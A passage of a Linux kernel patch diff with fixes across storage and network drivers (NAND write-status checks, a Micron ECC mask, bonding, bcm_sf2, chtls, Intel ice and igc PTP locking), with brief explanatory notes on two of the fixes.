+ 	.probe_slot	= gli_probe_slot_gl9763e,
+ 	.ops            = &sdhci_gl9763e_ops,
+ #ifdef CONFIG_PM_SLEEP
+-	.resume		= sdhci_cqhci_gli_resume,
+-	.suspend	= sdhci_cqhci_gli_suspend,
++	.resume		= gl9763e_resume,
++	.suspend	= gl9763e_suspend,
+ #endif
+ #ifdef CONFIG_PM
+ 	.runtime_suspend = gl9763e_runtime_suspend,
+diff --git a/drivers/mtd/maps/physmap-core.c b/drivers/mtd/maps/physmap-core.c
+index c73854da51363..19dad5a23f944 100644
+--- a/drivers/mtd/maps/physmap-core.c
++++ b/drivers/mtd/maps/physmap-core.c
+@@ -552,6 +552,17 @@ static int physmap_flash_probe(struct platform_device *dev)
+ 		if (info->probe_type) {
+ 			info->mtds[i] = do_map_probe(info->probe_type,
+ 						     &info->maps[i]);
++
++			/* Fall back to mapping region as ROM */
++			if (!info->mtds[i] && IS_ENABLED(CONFIG_MTD_ROM) &&
++			    strcmp(info->probe_type, "map_rom")) {
++				dev_warn(&dev->dev,
++					 "map_probe() failed for type %s\n",
++					 info->probe_type);
++
++				info->mtds[i] = do_map_probe("map_rom",
++							     &info->maps[i]);
++			}
+ 		} else {
+ 			int j;
+ 
+diff --git a/drivers/mtd/nand/raw/arasan-nand-controller.c b/drivers/mtd/nand/raw/arasan-nand-controller.c
+index ec7e6eeac55f9..e6ffe87a599eb 100644
+--- a/drivers/mtd/nand/raw/arasan-nand-controller.c
++++ b/drivers/mtd/nand/raw/arasan-nand-controller.c
+@@ -515,6 +515,7 @@ static int anfc_write_page_hw_ecc(struct nand_chip *chip, const u8 *buf,
+ 	struct mtd_info *mtd = nand_to_mtd(chip);
+ 	unsigned int len = mtd->writesize + (oob_required ? mtd->oobsize : 0);
+ 	dma_addr_t dma_addr;
++	u8 status;
+ 	int ret;
+ 	struct anfc_op nfc_op = {
+ 		.pkt_reg =
+@@ -561,10 +562,21 @@ static int anfc_write_page_hw_ecc(struct nand_chip *chip, const u8 *buf,
+ 	}
+ 
+ 	/* Spare data is not protected */
+-	if (oob_required)
++	if (oob_required) {
+ 		ret = nand_write_oob_std(chip, page);
++		if (ret)
++			return ret;
++	}
+ 
+-	return ret;
++	/* Check write status on the chip side */
++	ret = nand_status_op(chip, &status);
++	if (ret)
++		return ret;
++
++	if (status & NAND_STATUS_FAIL)
++		return -EIO;
++
++	return 0;
+ }
+ 
+ static int anfc_sel_write_page_hw_ecc(struct nand_chip *chip, const u8 *buf,
+diff --git a/drivers/mtd/nand/raw/marvell_nand.c b/drivers/mtd/nand/raw/marvell_nand.c
+index a57a1501449aa..d527c03630bce 100644
+--- a/drivers/mtd/nand/raw/marvell_nand.c
++++ b/drivers/mtd/nand/raw/marvell_nand.c
+@@ -1154,6 +1154,7 @@ static int marvell_nfc_hw_ecc_hmg_do_write_page(struct nand_chip *chip,
+ 		.ndcb[2] = NDCB2_ADDR5_PAGE(page),
+ 	};
+ 	unsigned int oob_bytes = lt->spare_bytes + (raw ? lt->ecc_bytes : 0);
++	u8 status;
+ 	int ret;
+ 
+ 	/* NFCv2 needs more information about the operation being executed */
+@@ -1187,7 +1188,18 @@ static int marvell_nfc_hw_ecc_hmg_do_write_page(struct nand_chip *chip,
+ 
+ 	ret = marvell_nfc_wait_op(chip,
+ 				  PSEC_TO_MSEC(sdr->tPROG_max));
+-	return ret;
++	if (ret)
++		return ret;
++
++	/* Check write status on the chip side */
++	ret = nand_status_op(chip, &status);
++	if (ret)
++		return ret;
++
++	if (status & NAND_STATUS_FAIL)
++		return -EIO;
++
++	return 0;
+ }
+ 
+ static int marvell_nfc_hw_ecc_hmg_write_page_raw(struct nand_chip *chip,
+@@ -1616,6 +1628,7 @@ static int marvell_nfc_hw_ecc_bch_write_page(struct nand_chip *chip,
+ 	int data_len = lt->data_bytes;
+ 	int spare_len = lt->spare_bytes;
+ 	int chunk, ret;
++	u8 status;
+ 
+ 	marvell_nfc_select_target(chip, chip->cur_cs);
+ 
+@@ -1652,6 +1665,14 @@ static int marvell_nfc_hw_ecc_bch_write_page(struct nand_chip *chip,
+ 	if (ret)
+ 		return ret;
+ 
++	/* Check write status on the chip side */
++	ret = nand_status_op(chip, &status);
++	if (ret)
++		return ret;
++
++	if (status & NAND_STATUS_FAIL)
++		return -EIO;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/mtd/nand/raw/pl35x-nand-controller.c b/drivers/mtd/nand/raw/pl35x-nand-controller.c
+index 3c6f6aff649f8..7bcece135715d 100644
+--- a/drivers/mtd/nand/raw/pl35x-nand-controller.c
++++ b/drivers/mtd/nand/raw/pl35x-nand-controller.c
+@@ -513,6 +513,7 @@ static int pl35x_nand_write_page_hwecc(struct nand_chip *chip,
+ 	u32 addr1 = 0, addr2 = 0, row;
+ 	u32 cmd_addr;
+ 	int i, ret;
++	u8 status;
+ 
+ 	ret = pl35x_smc_set_ecc_mode(nfc, chip, PL35X_SMC_ECC_CFG_MODE_APB);
+ 	if (ret)
+@@ -565,6 +566,14 @@ static int pl35x_nand_write_page_hwecc(struct nand_chip *chip,
+ 	if (ret)
+ 		goto disable_ecc_engine;
+ 
++	/* Check write status on the chip side */
++	ret = nand_status_op(chip, &status);
++	if (ret)
++		goto disable_ecc_engine;
++
++	if (status & NAND_STATUS_FAIL)
++		ret = -EIO;
++
+ disable_ecc_engine:
+ 	pl35x_smc_set_ecc_mode(nfc, chip, PL35X_SMC_ECC_CFG_MODE_BYPASS);
+ 
+diff --git a/drivers/mtd/nand/raw/qcom_nandc.c b/drivers/mtd/nand/raw/qcom_nandc.c
+index 198a44794d2dc..fbf36cbcbb18d 100644
+--- a/drivers/mtd/nand/raw/qcom_nandc.c
++++ b/drivers/mtd/nand/raw/qcom_nandc.c
+@@ -3310,7 +3310,7 @@ err_nandc_alloc:
+ err_aon_clk:
+ 	clk_disable_unprepare(nandc->core_clk);
+ err_core_clk:
+-	dma_unmap_resource(dev, res->start, resource_size(res),
++	dma_unmap_resource(dev, nandc->base_dma, resource_size(res),
+ 			   DMA_BIDIRECTIONAL, 0);
+ 	return ret;
+ }
+diff --git a/drivers/mtd/nand/spi/micron.c b/drivers/mtd/nand/spi/micron.c
+index 50b7295bc9222..12601bc4227a7 100644
+--- a/drivers/mtd/nand/spi/micron.c
++++ b/drivers/mtd/nand/spi/micron.c
+@@ -12,7 +12,7 @@
+ 
+ #define SPINAND_MFR_MICRON		0x2c
+ 
+-#define MICRON_STATUS_ECC_MASK		GENMASK(7, 4)
++#define MICRON_STATUS_ECC_MASK		GENMASK(6, 4)
+ #define MICRON_STATUS_ECC_NO_BITFLIPS	(0 << 4)
+ #define MICRON_STATUS_ECC_1TO3_BITFLIPS	(1 << 4)
+ #define MICRON_STATUS_ECC_4TO6_BITFLIPS	(3 << 4)
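
The mask narrows from bits 7:4 to 6:4 because bit 7 of the status byte is used for something other than ECC state on these Micron parts, so the old GENMASK(7, 4) could fold an unrelated bit into the decoded ECC value. A quick illustration (standalone C, example status value assumed):

    #include <stdio.h>

    /* Same arithmetic as the kernel's GENMASK(h, l), for 32-bit values */
    #define GENMASK(h, l) (((~0U) >> (31 - (h))) & ((~0U) << (l)))

    int main(void)
    {
            unsigned int status = 0xb0;     /* example: bit 7 set, ECC field 0x30 */

            printf("old: 0x%02x -> 0x%02x\n",
                   GENMASK(7, 4), status & GENMASK(7, 4));      /* 0xf0 -> 0xb0 */
            printf("new: 0x%02x -> 0x%02x\n",
                   GENMASK(6, 4), status & GENMASK(6, 4));      /* 0x70 -> 0x30 */
            return 0;
    }
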
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 7a3c7a74af04a..b170a3d8d007e 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -3990,7 +3990,7 @@ static inline const void *bond_pull_data(struct sk_buff *skb,
+ 	if (likely(n <= hlen))
+ 		return data;
+ 	else if (skb && likely(pskb_may_pull(skb, n)))
+-		return skb->head;
++		return skb->data;
+ 
+ 	return NULL;
+ }
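
The one-word bonding fix comes down to pskb_may_pull() semantics: on success it guarantees n linear bytes starting at skb->data (possibly after reallocating the head), while skb->head also covers headroom, so reading from it shifts every field offset. The safe pattern, as a sketch (not literal driver code):

    /* Sketch of the safe header-pull pattern */
    static const void *pull_hdr(struct sk_buff *skb, unsigned int n)
    {
            if (!pskb_may_pull(skb, n))
                    return NULL;    /* packet shorter than n bytes */

            return skb->data;       /* n linear bytes start here, not at skb->head */
    }
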
+diff --git a/drivers/net/dsa/bcm_sf2.c b/drivers/net/dsa/bcm_sf2.c
+index 72374b066f64a..cd1f240c90f39 100644
+--- a/drivers/net/dsa/bcm_sf2.c
++++ b/drivers/net/dsa/bcm_sf2.c
+@@ -617,17 +617,16 @@ static int bcm_sf2_mdio_register(struct dsa_switch *ds)
+ 	dn = of_find_compatible_node(NULL, NULL, "brcm,unimac-mdio");
+ 	priv->master_mii_bus = of_mdio_find_bus(dn);
+ 	if (!priv->master_mii_bus) {
+-		of_node_put(dn);
+-		return -EPROBE_DEFER;
++		err = -EPROBE_DEFER;
++		goto err_of_node_put;
+ 	}
+ 
+-	get_device(&priv->master_mii_bus->dev);
+ 	priv->master_mii_dn = dn;
+ 
+ 	priv->slave_mii_bus = mdiobus_alloc();
+ 	if (!priv->slave_mii_bus) {
+-		of_node_put(dn);
+-		return -ENOMEM;
++		err = -ENOMEM;
++		goto err_put_master_mii_bus_dev;
+ 	}
+ 
+ 	priv->slave_mii_bus->priv = priv;
+@@ -684,11 +683,17 @@ static int bcm_sf2_mdio_register(struct dsa_switch *ds)
+ 	}
+ 
+ 	err = mdiobus_register(priv->slave_mii_bus);
+-	if (err && dn) {
+-		mdiobus_free(priv->slave_mii_bus);
+-		of_node_put(dn);
+-	}
++	if (err && dn)
++		goto err_free_slave_mii_bus;
+ 
++	return 0;
++
++err_free_slave_mii_bus:
++	mdiobus_free(priv->slave_mii_bus);
++err_put_master_mii_bus_dev:
++	put_device(&priv->master_mii_bus->dev);
++err_of_node_put:
++	of_node_put(dn);
+ 	return err;
+ }
+ 
+@@ -696,6 +701,7 @@ static void bcm_sf2_mdio_unregister(struct bcm_sf2_priv *priv)
+ {
+ 	mdiobus_unregister(priv->slave_mii_bus);
+ 	mdiobus_free(priv->slave_mii_bus);
++	put_device(&priv->master_mii_bus->dev);
+ 	of_node_put(priv->master_mii_dn);
+ }
+ 
+diff --git a/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_io.c b/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_io.c
+index a4256087ac828..5e45bef4fd34f 100644
+--- a/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_io.c
++++ b/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_io.c
+@@ -911,7 +911,7 @@ static int csk_wait_memory(struct chtls_dev *cdev,
+ 			   struct sock *sk, long *timeo_p)
+ {
+ 	DEFINE_WAIT_FUNC(wait, woken_wake_function);
+-	int err = 0;
++	int ret, err = 0;
+ 	long current_timeo;
+ 	long vm_wait = 0;
+ 	bool noblock;
+@@ -942,10 +942,13 @@ static int csk_wait_memory(struct chtls_dev *cdev,
+ 
+ 		set_bit(SOCK_NOSPACE, &sk->sk_socket->flags);
+ 		sk->sk_write_pending++;
+-		sk_wait_event(sk, &current_timeo, sk->sk_err ||
+-			      (sk->sk_shutdown & SEND_SHUTDOWN) ||
+-			      (csk_mem_free(cdev, sk) && !vm_wait), &wait);
++		ret = sk_wait_event(sk, &current_timeo, sk->sk_err ||
++				    (sk->sk_shutdown & SEND_SHUTDOWN) ||
++				    (csk_mem_free(cdev, sk) && !vm_wait),
++				    &wait);
+ 		sk->sk_write_pending--;
++		if (ret < 0)
++			goto do_error;
+ 
+ 		if (vm_wait) {
+ 			vm_wait -= current_timeo;
+@@ -1438,6 +1441,7 @@ static int chtls_pt_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 	int copied = 0;
+ 	int target;
+ 	long timeo;
++	int ret;
+ 
+ 	buffers_freed = 0;
+ 
+@@ -1513,7 +1517,11 @@ static int chtls_pt_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 		if (copied >= target)
+ 			break;
+ 		chtls_cleanup_rbuf(sk, copied);
+-		sk_wait_data(sk, &timeo, NULL);
++		ret = sk_wait_data(sk, &timeo, NULL);
++		if (ret < 0) {
++			copied = copied ? : ret;
++			goto unlock;
++		}
+ 		continue;
+ found_ok_skb:
+ 		if (!skb->len) {
+@@ -1608,6 +1616,8 @@ skip_copy:
+ 
+ 	if (buffers_freed)
+ 		chtls_cleanup_rbuf(sk, copied);
++
++unlock:
+ 	release_sock(sk);
+ 	return copied;
+ }
+@@ -1624,6 +1634,7 @@ static int peekmsg(struct sock *sk, struct msghdr *msg,
+ 	int copied = 0;
+ 	size_t avail;          /* amount of available data in current skb */
+ 	long timeo;
++	int ret;
+ 
+ 	lock_sock(sk);
+ 	timeo = sock_rcvtimeo(sk, flags & MSG_DONTWAIT);
+@@ -1675,7 +1686,12 @@ static int peekmsg(struct sock *sk, struct msghdr *msg,
+ 			release_sock(sk);
+ 			lock_sock(sk);
+ 		} else {
+-			sk_wait_data(sk, &timeo, NULL);
++			ret = sk_wait_data(sk, &timeo, NULL);
++			if (ret < 0) {
++				/* here 'copied' is 0 due to previous checks */
++				copied = ret;
++				break;
++			}
+ 		}
+ 
+ 		if (unlikely(peek_seq != tp->copied_seq)) {
+@@ -1746,6 +1762,7 @@ int chtls_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 	int copied = 0;
+ 	long timeo;
+ 	int target;             /* Read at least this many bytes */
++	int ret;
+ 
+ 	buffers_freed = 0;
+ 
+@@ -1837,7 +1854,11 @@ int chtls_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 		if (copied >= target)
+ 			break;
+ 		chtls_cleanup_rbuf(sk, copied);
+-		sk_wait_data(sk, &timeo, NULL);
++		ret = sk_wait_data(sk, &timeo, NULL);
++		if (ret < 0) {
++			copied = copied ? : ret;
++			goto unlock;
++		}
+ 		continue;
+ 
+ found_ok_skb:
+@@ -1906,6 +1927,7 @@ skip_copy:
+ 	if (buffers_freed)
+ 		chtls_cleanup_rbuf(sk, copied);
+ 
++unlock:
+ 	release_sock(sk);
+ 	return copied;
+ }
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_common.c b/drivers/net/ethernet/intel/i40e/i40e_common.c
+index 82e06272158df..6266756b47b9d 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_common.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_common.c
+@@ -1082,7 +1082,7 @@ void i40e_clear_hw(struct i40e_hw *hw)
+ 		     I40E_PFLAN_QALLOC_FIRSTQ_SHIFT;
+ 	j = (val & I40E_PFLAN_QALLOC_LASTQ_MASK) >>
+ 	    I40E_PFLAN_QALLOC_LASTQ_SHIFT;
+-	if (val & I40E_PFLAN_QALLOC_VALID_MASK)
++	if (val & I40E_PFLAN_QALLOC_VALID_MASK && j >= base_queue)
+ 		num_queues = (j - base_queue) + 1;
+ 	else
+ 		num_queues = 0;
+@@ -1092,7 +1092,7 @@ void i40e_clear_hw(struct i40e_hw *hw)
+ 	    I40E_PF_VT_PFALLOC_FIRSTVF_SHIFT;
+ 	j = (val & I40E_PF_VT_PFALLOC_LASTVF_MASK) >>
+ 	    I40E_PF_VT_PFALLOC_LASTVF_SHIFT;
+-	if (val & I40E_PF_VT_PFALLOC_VALID_MASK)
++	if (val & I40E_PF_VT_PFALLOC_VALID_MASK && j >= i)
+ 		num_vfs = (j - i) + 1;
+ 	else
+ 		num_vfs = 0;
+diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c
+index 7276badfa19ea..c051503c3a892 100644
+--- a/drivers/net/ethernet/intel/ice/ice_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_lib.c
+@@ -1100,8 +1100,7 @@ static void ice_set_rss_vsi_ctx(struct ice_vsi_ctx *ctxt, struct ice_vsi *vsi)
+ 
+ 	ctxt->info.q_opt_rss = ((lut_type << ICE_AQ_VSI_Q_OPT_RSS_LUT_S) &
+ 				ICE_AQ_VSI_Q_OPT_RSS_LUT_M) |
+-				((hash_type << ICE_AQ_VSI_Q_OPT_RSS_HASH_S) &
+-				 ICE_AQ_VSI_Q_OPT_RSS_HASH_M);
++				(hash_type & ICE_AQ_VSI_Q_OPT_RSS_HASH_M);
+ }
+ 
+ static void
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 3f98781e74b28..f0f39364819ac 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -6,6 +6,7 @@
+ #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+ 
+ #include <generated/utsrelease.h>
++#include <linux/crash_dump.h>
+ #include "ice.h"
+ #include "ice_base.h"
+ #include "ice_lib.h"
+@@ -4681,6 +4682,20 @@ ice_probe(struct pci_dev *pdev, const struct pci_device_id __always_unused *ent)
+ 		return -EINVAL;
+ 	}
+ 
++	/* When under a kdump kernel, initiate a reset before enabling the
++	 * device in order to clear out any pending DMA transactions. These
++	 * transactions can cause some systems to machine check when doing
++	 * the pcim_enable_device() below.
++	 */
++	if (is_kdump_kernel()) {
++		pci_save_state(pdev);
++		pci_clear_master(pdev);
++		err = pcie_flr(pdev);
++		if (err)
++			return err;
++		pci_restore_state(pdev);
++	}
++
+ 	/* this driver uses devres, see
+ 	 * Documentation/driver-api/driver-model/devres.rst
+ 	 */
+@@ -4708,7 +4723,6 @@ ice_probe(struct pci_dev *pdev, const struct pci_device_id __always_unused *ent)
+ 		return err;
+ 	}
+ 
+-	pci_enable_pcie_error_reporting(pdev);
+ 	pci_set_master(pdev);
+ 
+ 	pf->pdev = pdev;
+@@ -5001,7 +5015,6 @@ err_init_pf_unroll:
+ 	ice_devlink_destroy_regions(pf);
+ 	ice_deinit_hw(hw);
+ err_exit_unroll:
+-	pci_disable_pcie_error_reporting(pdev);
+ 	pci_disable_device(pdev);
+ 	return err;
+ }
+@@ -5127,7 +5140,6 @@ static void ice_remove(struct pci_dev *pdev)
+ 	ice_reset(&pf->hw, ICE_RESET_PFR);
+ 	pci_wait_for_pending_transaction(pdev);
+ 	ice_clear_interrupt_scheme(pf);
+-	pci_disable_pcie_error_reporting(pdev);
+ 	pci_disable_device(pdev);
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/igc/igc.h b/drivers/net/ethernet/intel/igc/igc.h
+index d3b17aa1d1a83..43c05b41627f7 100644
+--- a/drivers/net/ethernet/intel/igc/igc.h
++++ b/drivers/net/ethernet/intel/igc/igc.h
+@@ -183,9 +183,11 @@ struct igc_adapter {
+ 	u32 max_frame_size;
+ 	u32 min_frame_size;
+ 
++	int tc_setup_type;
+ 	ktime_t base_time;
+ 	ktime_t cycle_time;
+ 	bool qbv_enable;
++	u32 qbv_config_change_errors;
+ 
+ 	/* OS defined structs */
+ 	struct pci_dev *pdev;
+@@ -228,6 +230,10 @@ struct igc_adapter {
+ 	struct ptp_clock *ptp_clock;
+ 	struct ptp_clock_info ptp_caps;
+ 	struct work_struct ptp_tx_work;
++	/* Access to ptp_tx_skb and ptp_tx_start are protected by the
++	 * ptp_tx_lock.
++	 */
++	spinlock_t ptp_tx_lock;
+ 	struct sk_buff *ptp_tx_skb;
+ 	struct hwtstamp_config tstamp_config;
+ 	unsigned long ptp_tx_start;
+@@ -429,7 +435,6 @@ enum igc_state_t {
+ 	__IGC_TESTING,
+ 	__IGC_RESETTING,
+ 	__IGC_DOWN,
+-	__IGC_PTP_TX_IN_PROGRESS,
+ };
+ 
+ enum igc_tx_flags {
+diff --git a/drivers/net/ethernet/intel/igc/igc_base.c b/drivers/net/ethernet/intel/igc/igc_base.c
+index a15927e772720..a1d815af507d9 100644
+--- a/drivers/net/ethernet/intel/igc/igc_base.c
++++ b/drivers/net/ethernet/intel/igc/igc_base.c
+@@ -396,6 +396,35 @@ void igc_rx_fifo_flush_base(struct igc_hw *hw)
+ 	rd32(IGC_MPC);
+ }
+ 
++bool igc_is_device_id_i225(struct igc_hw *hw)
++{
++	switch (hw->device_id) {
++	case IGC_DEV_ID_I225_LM:
++	case IGC_DEV_ID_I225_V:
++	case IGC_DEV_ID_I225_I:
++	case IGC_DEV_ID_I225_K:
++	case IGC_DEV_ID_I225_K2:
++	case IGC_DEV_ID_I225_LMVP:
++	case IGC_DEV_ID_I225_IT:
++		return true;
++	default:
++		return false;
++	}
++}
++
++bool igc_is_device_id_i226(struct igc_hw *hw)
++{
++	switch (hw->device_id) {
++	case IGC_DEV_ID_I226_LM:
++	case IGC_DEV_ID_I226_V:
++	case IGC_DEV_ID_I226_K:
++	case IGC_DEV_ID_I226_IT:
++		return true;
++	default:
++		return false;
++	}
++}
++
+ static struct igc_mac_operations igc_mac_ops_base = {
+ 	.init_hw		= igc_init_hw_base,
+ 	.check_for_link		= igc_check_for_copper_link,
+diff --git a/drivers/net/ethernet/intel/igc/igc_base.h b/drivers/net/ethernet/intel/igc/igc_base.h
+index 52849f5e8048d..9f3827eda157c 100644
+--- a/drivers/net/ethernet/intel/igc/igc_base.h
++++ b/drivers/net/ethernet/intel/igc/igc_base.h
+@@ -7,6 +7,8 @@
+ /* forward declaration */
+ void igc_rx_fifo_flush_base(struct igc_hw *hw);
+ void igc_power_down_phy_copper_base(struct igc_hw *hw);
++bool igc_is_device_id_i225(struct igc_hw *hw);
++bool igc_is_device_id_i226(struct igc_hw *hw);
+ 
+ /* Transmit Descriptor - Advanced */
+ union igc_adv_tx_desc {
+diff --git a/drivers/net/ethernet/intel/igc/igc_defines.h b/drivers/net/ethernet/intel/igc/igc_defines.h
+index 90ca01889cd82..efdabcbd66ddd 100644
+--- a/drivers/net/ethernet/intel/igc/igc_defines.h
++++ b/drivers/net/ethernet/intel/igc/igc_defines.h
+@@ -515,6 +515,7 @@
+ /* Transmit Scheduling */
+ #define IGC_TQAVCTRL_TRANSMIT_MODE_TSN	0x00000001
+ #define IGC_TQAVCTRL_ENHANCED_QAV	0x00000008
++#define IGC_TQAVCTRL_FUTSCDDIS		0x00000080
+ 
+ #define IGC_TXQCTL_QUEUE_MODE_LAUNCHT	0x00000001
+ #define IGC_TXQCTL_STRICT_CYCLE		0x00000002
+diff --git a/drivers/net/ethernet/intel/igc/igc_ethtool.c b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+index 9166fde40c772..e23b95edb05ef 100644
+--- a/drivers/net/ethernet/intel/igc/igc_ethtool.c
++++ b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+@@ -67,6 +67,7 @@ static const struct igc_stats igc_gstrings_stats[] = {
+ 	IGC_STAT("rx_hwtstamp_cleared", rx_hwtstamp_cleared),
+ 	IGC_STAT("tx_lpi_counter", stats.tlpic),
+ 	IGC_STAT("rx_lpi_counter", stats.rlpic),
++	IGC_STAT("qbv_config_change_errors", qbv_config_change_errors),
+ };
+ 
+ #define IGC_NETDEV_STAT(_net_stat) { \
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 1ac836a55cd31..4b6f882b380dc 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -1606,9 +1606,10 @@ done:
+ 		 * the other timer registers before skipping the
+ 		 * timestamping request.
+ 		 */
+-		if (adapter->tstamp_config.tx_type == HWTSTAMP_TX_ON &&
+-		    !test_and_set_bit_lock(__IGC_PTP_TX_IN_PROGRESS,
+-					   &adapter->state)) {
++		unsigned long flags;
++
++		spin_lock_irqsave(&adapter->ptp_tx_lock, flags);
++		if (adapter->tstamp_config.tx_type == HWTSTAMP_TX_ON && !adapter->ptp_tx_skb) {
+ 			skb_shinfo(skb)->tx_flags |= SKBTX_IN_PROGRESS;
+ 			tx_flags |= IGC_TX_FLAGS_TSTAMP;
+ 
+@@ -1617,6 +1618,8 @@ done:
+ 		} else {
+ 			adapter->tx_hwtstamp_skipped++;
+ 		}
++
++		spin_unlock_irqrestore(&adapter->ptp_tx_lock, flags);
+ 	}
+ 
+ 	if (skb_vlan_tag_present(skb)) {
+@@ -6035,6 +6038,7 @@ static bool validate_schedule(struct igc_adapter *adapter,
+ 			      const struct tc_taprio_qopt_offload *qopt)
+ {
+ 	int queue_uses[IGC_MAX_TX_QUEUES] = { };
++	struct igc_hw *hw = &adapter->hw;
+ 	struct timespec64 now;
+ 	size_t n;
+ 
+@@ -6047,8 +6051,10 @@ static bool validate_schedule(struct igc_adapter *adapter,
+ 	 * in the future, it will hold all the packets until that
+ 	 * time, causing a lot of TX Hangs, so to avoid that, we
+ 	 * reject schedules that would start in the future.
++	 * Note: the limitation above no longer applies to i226.
+ 	 */
+-	if (!is_base_time_past(qopt->base_time, &now))
++	if (!is_base_time_past(qopt->base_time, &now) &&
++	    igc_is_device_id_i225(hw))
+ 		return false;
+ 
+ 	for (n = 0; n < qopt->num_entries; n++) {
+@@ -6103,6 +6109,7 @@ static int igc_tsn_clear_schedule(struct igc_adapter *adapter)
+ 
+ 	adapter->base_time = 0;
+ 	adapter->cycle_time = NSEC_PER_SEC;
++	adapter->qbv_config_change_errors = 0;
+ 
+ 	for (i = 0; i < adapter->num_tx_queues; i++) {
+ 		struct igc_ring *ring = adapter->tx_ring[i];
+@@ -6118,6 +6125,7 @@ static int igc_save_qbv_schedule(struct igc_adapter *adapter,
+ 				 struct tc_taprio_qopt_offload *qopt)
+ {
+ 	bool queue_configured[IGC_MAX_TX_QUEUES] = { };
++	struct igc_hw *hw = &adapter->hw;
+ 	u32 start_time = 0, end_time = 0;
+ 	size_t n;
+ 	int i;
+@@ -6130,7 +6138,7 @@ static int igc_save_qbv_schedule(struct igc_adapter *adapter,
+ 	if (qopt->base_time < 0)
+ 		return -ERANGE;
+ 
+-	if (adapter->base_time)
++	if (igc_is_device_id_i225(hw) && adapter->base_time)
+ 		return -EALREADY;
+ 
+ 	if (!validate_schedule(adapter, qopt))
+@@ -6283,6 +6291,8 @@ static int igc_setup_tc(struct net_device *dev, enum tc_setup_type type,
+ {
+ 	struct igc_adapter *adapter = netdev_priv(dev);
+ 
++	adapter->tc_setup_type = type;
++
+ 	switch (type) {
+ 	case TC_SETUP_QDISC_TAPRIO:
+ 		return igc_tsn_enable_qbv_scheduling(adapter, type_data);
+diff --git a/drivers/net/ethernet/intel/igc/igc_ptp.c b/drivers/net/ethernet/intel/igc/igc_ptp.c
+index d96cdccdc1e1e..14cd7f995280d 100644
+--- a/drivers/net/ethernet/intel/igc/igc_ptp.c
++++ b/drivers/net/ethernet/intel/igc/igc_ptp.c
+@@ -622,6 +622,7 @@ static int igc_ptp_set_timestamp_mode(struct igc_adapter *adapter,
+ 	return 0;
+ }
+ 
++/* Requires adapter->ptp_tx_lock held by caller. */
+ static void igc_ptp_tx_timeout(struct igc_adapter *adapter)
+ {
+ 	struct igc_hw *hw = &adapter->hw;
+@@ -629,7 +630,6 @@ static void igc_ptp_tx_timeout(struct igc_adapter *adapter)
+ 	dev_kfree_skb_any(adapter->ptp_tx_skb);
+ 	adapter->ptp_tx_skb = NULL;
+ 	adapter->tx_hwtstamp_timeouts++;
+-	clear_bit_unlock(__IGC_PTP_TX_IN_PROGRESS, &adapter->state);
+ 	/* Clear the tx valid bit in TSYNCTXCTL register to enable interrupt. */
+ 	rd32(IGC_TXSTMPH);
+ 	netdev_warn(adapter->netdev, "Tx timestamp timeout\n");
+@@ -637,20 +637,20 @@ static void igc_ptp_tx_timeout(struct igc_adapter *adapter)
+ 
+ void igc_ptp_tx_hang(struct igc_adapter *adapter)
+ {
+-	bool timeout = time_is_before_jiffies(adapter->ptp_tx_start +
+-					      IGC_PTP_TX_TIMEOUT);
++	unsigned long flags;
+ 
+-	if (!test_bit(__IGC_PTP_TX_IN_PROGRESS, &adapter->state))
+-		return;
++	spin_lock_irqsave(&adapter->ptp_tx_lock, flags);
+ 
+-	/* If we haven't received a timestamp within the timeout, it is
+-	 * reasonable to assume that it will never occur, so we can unlock the
+-	 * timestamp bit when this occurs.
+-	 */
+-	if (timeout) {
+-		cancel_work_sync(&adapter->ptp_tx_work);
+-		igc_ptp_tx_timeout(adapter);
+-	}
++	if (!adapter->ptp_tx_skb)
++		goto unlock;
++
++	if (time_is_after_jiffies(adapter->ptp_tx_start + IGC_PTP_TX_TIMEOUT))
++		goto unlock;
++
++	igc_ptp_tx_timeout(adapter);
++
++unlock:
++	spin_unlock_irqrestore(&adapter->ptp_tx_lock, flags);
+ }
+ 
+ /**
+@@ -660,6 +660,8 @@ void igc_ptp_tx_hang(struct igc_adapter *adapter)
+  * If we were asked to do hardware stamping and such a time stamp is
+  * available, then it must have been for this skb here because we only
+  * allow only one such packet into the queue.
++ *
++ * Context: Expects adapter->ptp_tx_lock to be held by caller.
+  */
+ static void igc_ptp_tx_hwtstamp(struct igc_adapter *adapter)
+ {
+@@ -695,13 +697,7 @@ static void igc_ptp_tx_hwtstamp(struct igc_adapter *adapter)
+ 	shhwtstamps.hwtstamp =
+ 		ktime_add_ns(shhwtstamps.hwtstamp, adjust);
+ 
+-	/* Clear the lock early before calling skb_tstamp_tx so that
+-	 * applications are not woken up before the lock bit is clear. We use
+-	 * a copy of the skb pointer to ensure other threads can't change it
+-	 * while we're notifying the stack.
+-	 */
+ 	adapter->ptp_tx_skb = NULL;
+-	clear_bit_unlock(__IGC_PTP_TX_IN_PROGRESS, &adapter->state);
+ 
+ 	/* Notify the stack and free the skb after we've unlocked */
+ 	skb_tstamp_tx(skb, &shhwtstamps);
